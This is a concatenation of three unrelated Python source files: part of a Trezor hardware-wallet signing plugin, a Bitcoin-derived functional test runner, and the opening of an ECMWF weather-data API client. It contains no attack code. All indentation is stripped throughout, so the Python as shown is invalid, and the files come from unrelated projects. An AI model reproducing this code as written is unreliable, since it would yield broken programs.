.format(self.device, client.label(), self.firmware_URL))
creating = not device_info.initialized
if creating:
self.initialize_device(device_id, wizard, client.handler)
wizard.run_task_without_blocking_gui(
task=lambda: client.get_xpub('m', 'standard', creating))
client.used()
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
client = self.scan_and_create_client_for_device(
device_id=device_id, wizard=wizard
)
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, is_multisig):
if is_multisig:
return InputScriptType.SPENDMULTISIG
else:
return InputScriptType.SPENDADDRESS
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx, client)
details = SignTx(lock_time=tx.locktime)
signatures, signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [bh2u(x) for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
# prepare multisig, if available
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
script_type = self.get_trezor_input_script_type(multisig is not None)
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(multisig is not None)
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx, client):
def create_output_by_derivation():
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
script_type = OutputScriptType.PAYTOADDRESS if multisig is None else OutputScriptType.PAYTOMULTISIG
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
script = address.to_script()
# We only support OP_RETURN with one constant push
if (script[0] == 0x6a and amount == 0 and
script[1] == len(script) - 2 and
script[1] <= 75):
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = script[2:]
else:
raise Exception(_("Unsupported output script."))
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
# ecash: addresses are not supported yet by trezor
ui_addr_fmt = address.FMT_UI
if ui_addr_fmt == address.FMT_CASHADDR:
ui_addr_fmt = address.FMT_CASHADDR_BCH
addr_format = address.FMT_LEGACY
if client.get_trezor_model() == 'T':
if client.atleast_version(2, 0, 8):
addr_format = ui_addr_fmt
elif client.atleast_version(2, 0, 7):
addr_format = address.FMT_CASHADDR_BCH
else:
if client.atleast_version(1, 6, 2):
addr_format = ui_addr_fmt
txoutputtype.address = address.to_full_string(addr_format)
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = self.is_any_tx_output_on_change_branch(tx)
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m, script_type = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def is_any_tx_output_on_change_branch(self, tx):
if not tx.output_info:
return False
for _type, address, _amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and info[0][0] == 1:
return True
return False
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
# for electrum-abc previous tx is never needed, since it uses
# bip-143 signatures.
return None
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
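# Illustration of the OP_RETURN check in create_output_by_address() above, using
# hypothetical script bytes purely to make the three conditions concrete:
#   script = bytes([0x6a, 0x04]) + b'data'   # OP_RETURN followed by a single 4-byte push
#   script[0] == 0x6a                        # opcode is OP_RETURN
#   script[1] == len(script) - 2             # the push length covers the rest of the script
#   script[1] <= 75                          # a direct push, no OP_PUSHDATA variants
# Such an output (with amount == 0) is encoded as PAYTOOPRETURN with
# op_return_data = script[2:]; anything else raises "Unsupported output script."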
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
    # When a test is listed here, it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
    # testName --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status, int(time.time() - time0), stdout, stderr)
def on_ci():
    return os.getenv('TRAVIS') == 'true' or os.getenv('TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='generate a basic coverage report for the RPC interface')
parser.add_argument(
'--exclude', '-x', help='specify a comma-separated-list of scripts to exclude.')
parser.add_argument('--extended', action='store_true',
help='run the extended test suite in addition to the basic tests')
parser.add_argument('--cutoff', type=int, default=DEFAULT_EXTENDED_CUTOFF,
help='set the cutoff runtime for what tests get run')
parser.add_argument('--force', '-f', action='store_true',
help='run tests even on platforms where they are disabled by default (e.g. windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='print help text and exit')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='how many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='the default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='only print results summary and failure logs')
parser.add_argument('--tmpdirprefix', '-t',
default=tempfile.gettempdir(), help="Root directory for datadirs")
parser.add_argument('--junitoutput', '-J',
default=os.path.join(build_dir, 'junit_results.xml'), help="file that will store JUnit formatted test results.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
enable_wallet = config["components"].getboolean("ENABLE_WALLET")
enable_utils = config["components"].getboolean("ENABLE_UTILS")
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not (enable_wallet and enable_utils and enable_bitcoind):
print(
"No functional tests to run. Wallet, utils, and bitcoind must all be enabled")
print(
"Rerun `configure` with -enable-wallet, -with-utils and -with-daemon and rerun make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if not test in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
cutoff = args.cutoff
if args.extended:
cutoff = sys.maxsize
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t) +
".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
    # Always use timings from src_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
    run_tests(test_list, build_dir, tests_dir, config["environment"]["EXEEXT"], args.junitoutput,
              tmpdir, args.jobs, args.coverage, passon_args, args.combinedlogslen, build_timings)
def run_tests(test_list, build_dir, tests_dir, exeext, junitoutput, tmpdir, num_jobs, enable_coverage=False, args=[], combined_logs_len=0, build_timings=None):
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "wormholed"])
if pidofOutput is not None and pidofOutput != b'':
print("%sWARNING!%s There is already a wormholed process running on this system. Tests may fail unexpectedly due to resource contention!" % (
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
# Set env vars
if "BITCOIND" not in os.environ:
os.environ["BITCOIND"] = os.path.join(
build_dir, 'src', 'wormholed' + exeext)
os.environ["BITCOINCLI"] = os.path.join(
build_dir, 'src', 'wormholed-cli' + exeext)
flags = [os.path.join("--srcdir={}".format(build_dir), "src")] + args
flags.append("--cachedir={}".format(cache_dir))
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(
map(lambda test_result: test_result.was_successful, test_results))
sys.exit(not all_passed)
def execute_test_processes(num_jobs, test_list, tests_dir, tmpdir, flags):
update_queue = Queue()
job_queue = Queue()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
        handle_test_cases represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
t = threading.Thread(target=handle_update_messages)
    t.daemon = True
t.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
        t.daemon = True
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name, runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print("\n".join(deque(combined_logs.splitlines(), combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated) \n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} s\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), self.time) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
    Return all available test scripts from the script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def get_tests_to_run(test_list, test_params, cutoff, src_timings):
"""
    Returns only tests that will not run longer than the cutoff.
    Long running tests are returned first to favor running tests in parallel.
    Timings from the build directory override those from the src directory.
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = [t for t in tests_with_params if get_test_time(t) <= cutoff]
result.sort(key=lambda x: (-get_test_time(x), x))
return result
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
else:
print("All RPC commands covered.")
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test-framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
def save_results_as_junit(test_results, file_name, time):
"""
Save tests results to file in JUnit format
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "bitcoin_abc_tests",
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped")
elif test_result.status == "Failed":
ET.SubElement(e_test_case, "failure")
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return new list containing existing timings updated with new timings
        Tests that no longer exist are not removed.
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
        # we only save tests that have passed - timings for failed tests might be
# wrong (timeouts or early fails)
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
if __name__ == '__main__':
main()
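# Example invocations (illustrative; see the argument parser above for the full
# option list):
#   test/functional/test_runner.py                         # run the default (non-extended) set
#   test/functional/test_runner.py wallet_txn_clone p2p_*  # named tests plus a trailing wildcard
#   test/functional/test_runner.py --extended --jobs=8     # run everything, 8 scripts in parallel
#   test/functional/test_runner.py --coverage              # also produce an RPC coverage report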
|
ECMWFDataServer.py
|
#
# (C) Copyright 2012-2013 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
#
# (C) Copyright 2017 Ricardo Persoon.
from .exceptions import *
import json
import os
import queue
import threading
import time
from .api_connection import *
from .config import *
from .log import *
class ECMWFDataServer:
def __init__(self, api_url=None, api_key=None, api_email=None, verbose=False, custom_log=None,
custom_log_level=False):
"""
:param api_url: ECMWF API url
:param api_key: authentication API key
:param api_email: e-mail address used to register for the API
:param verbose: not used, but here for backwards compatibility
        :param custom_log: custom logging function. If not specified, the built-in logging class will be used
:param custom_log_level: whether the provided custom logging function accepts a 2nd parameter with the log
call that specifies the logging level. If not, only 1 parameter string is passed for logging
"""
# Load the configuration file
try:
config.load(os.path.join(os.path.dirname(__file__), 'config.ini'))
except ConfigError as e:
raise DataServerError("Failed to load configuration file config.ini: %s" % e)
# Initialise the logging
if custom_log is None:
self.log_level = True
display_info_messages = config.get_boolean('display_info_messages', 'log')
display_warning_messages = config.get_boolean('display_warning_messages', 'log')
display_error_messages = config.get_boolean('display_error_messages', 'log')
self.log_method = Log(display_info_messages, display_warning_messages, display_error_messages).log
else:
self.log_level = custom_log_level
self.log_method = custom_log
# If API credentials are not passed, try to retrieve the API credentials from the configuration file first
if api_url is None or api_key is None or api_email is None:
try:
api_url = config.get('url', 'api')
api_key = config.get('key', 'api')
api_email = config.get('email', 'api')
except ConfigError:
pass
        # If API credentials were not in the configuration file either, retrieve them from the ~/.ecmwfapirc file or
# environment
if api_url is None or api_key is None or api_email is None or api_url == 'none' or api_key == 'none' \
or api_email == 'none':
try:
[api_key, api_url, api_email] = self._get_api_key_values()
except APIKeyFetchError as e:
self.log("Failed to retrieve ECMWF API key: %s" % e, 'error')
raise DataServerError("Failed to retrieve ECMWF API key from all sources: %s" % e)
self.api_url = api_url
self.api_key = api_key
self.api_email = api_email
self.transfer_queue = None
self.log("ECMWF API python library %s initialised" % config.get('version', 'client'), 'info')
def log(self, message, level, request_id=None):
"""
        Passed to the transfer classes to provide logging; uses the available logging method to log messages. This method is
required for backwards compatibility and to support different custom logging functions, either with one (message
only) or two (message and log level) parameters
:param message: message to log
:param level: log level, in [info, warning, error] for the default logging module
:param request_id: optional request id to add to log messages
"""
# Add the request id to the message if it is specified
if isinstance(request_id, int):
message = '(Request %s) %s' % (request_id, message)
if self.log_level:
self.log_method(message, level)
else:
self.log_method("[%s] %s" % (level, message))
def retrieve(self, request_data):
"""
Retrieve a dataset with the given parameters
:param request_data: parameter list for transfer, or list of multiple parameter lists
"""
if isinstance(request_data, dict):
request_data = [request_data]
elif not isinstance(request_data, list):
self.log("The request data object should be a dictionary with the parameters or a list with multiple"
"dictionaries for multiple transfers", 'error')
return
